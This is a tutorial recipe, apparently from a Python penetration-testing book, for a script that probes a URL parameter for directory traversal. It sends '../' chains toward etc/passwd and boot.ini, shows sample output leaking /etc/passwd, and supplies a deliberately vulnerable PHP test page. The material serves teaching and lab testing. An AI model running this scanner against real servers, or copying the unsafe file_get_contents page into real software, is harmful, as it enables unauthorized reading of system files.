Identify the URL parameter that you wish to test. This script has been configured to work with most devices: etc/passwd should work with OSX and Linux installations and boot.ini should work with Windows installations. See the end of this example for a PHP web page that can be used against to test the validity of the scripts.

We will be using the requests library that can be installed through pip. In the author's opinion, it's better than urllib in terms of functionality and usability.

Once you've identified your parameter to attack, pass it to the script as a command line argument. Your script should be the same as the following script:

import requests
import sys
url = sys.argv[1]
payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
up = "../"
i = 0
for payload, string in payloads.iteritems():
  for i in xrange(7):
    req = requests.post(url+(i*up)+payload)
    if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break

The following is an example of the output produced when using this script:

Parameter vulnerable

Attack string: ../../../../../etc/passwd

Get me /etc/passwd! File Contents:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

We import the libraries we require for this script, as with every other script we've done in the book so far:

url = sys.argv[1]

We then take our input in the form of a URL. As we are using the requests library, we should ensure that our URL matches the form requests is expecting, which is http(s)://url. Requests will remind you of this if you get it wrong:

payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}

We establish the payloads which we are going to send in each attack in a dictionary. The first value in each pair is the file that we wish to attempt to load and the second is a value that will definitely be within that file. The more specific that second value is, the fewer false positives that will occur; however, this may increase the chances of false negatives. Feel free to include your own files here:

up = "../"
i = 0

We provide the up directory shortcut ../ and assign it to the up variable and we set the counter for our loop to 0:

for payload, string in payloads.iteritems():
  while i < 7:

The Iteritems method allows us to go through the dictionary and take each key and value, and assign them to variables. We assign the first value as payload and the second value as string. We then cap our loop to stop it repeating forever in the event of a failure. I have set this to 7 though this can be set to any value that you please. Bear in mind the likelihood of a directory structure for a web app being any higher than 7:

req = requests.post(url+(i*up)+payload)

We craft our request by taking our root URL and appending the current number of up directories according to the loop and the payload. This is then sent in a post request:

if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break

We check to see whether we have achieved our goal by looking for our intended string in the response. If the string is present, we halt the loop and print out the attack string, along with the response to the successful attack. This allows us to manually verify whether the attack was successful or whether the code needs to be refactored, or the web app isn't vulnerable:

    i = i+1
  i = 0

Finally, the counter is added to each loop until it reaches the preset max. Once the max is reached, it is set to zero for the next attack string.

This recipe can be adapted to work with parameters through the application of the principles shown elsewhere in the book. However, due to the rarity of pages being called through parameters and intentional brevity, this has not been provided.

This can be extended, as earlier mentioned, by adding additional files and their commonly occurring strings. It could also be extended to grabbing all interesting files once the ability to directory traverse and the depth required to reach root has been established.

The following is a PHP web page that will allow you to test this script on your own build. Just put it in your var/www directory or whichever solution you use. Do not leave this active on an unknown network:

<?php
echo "Get me /etc/passwd! File Contents";
if (!isset($_REQUEST['id'])){
header( 'Location: /traversal/first.php?id=1' ) ;
}
if (isset($_REQUEST['id'])){
  if ($_REQUEST['id'] == "1"){
    $file = file_get_contents("data.html", true);
    echo $file;}

else{
  $file = file_get_contents($_REQUEST['id']);
  echo $file;
}
}?>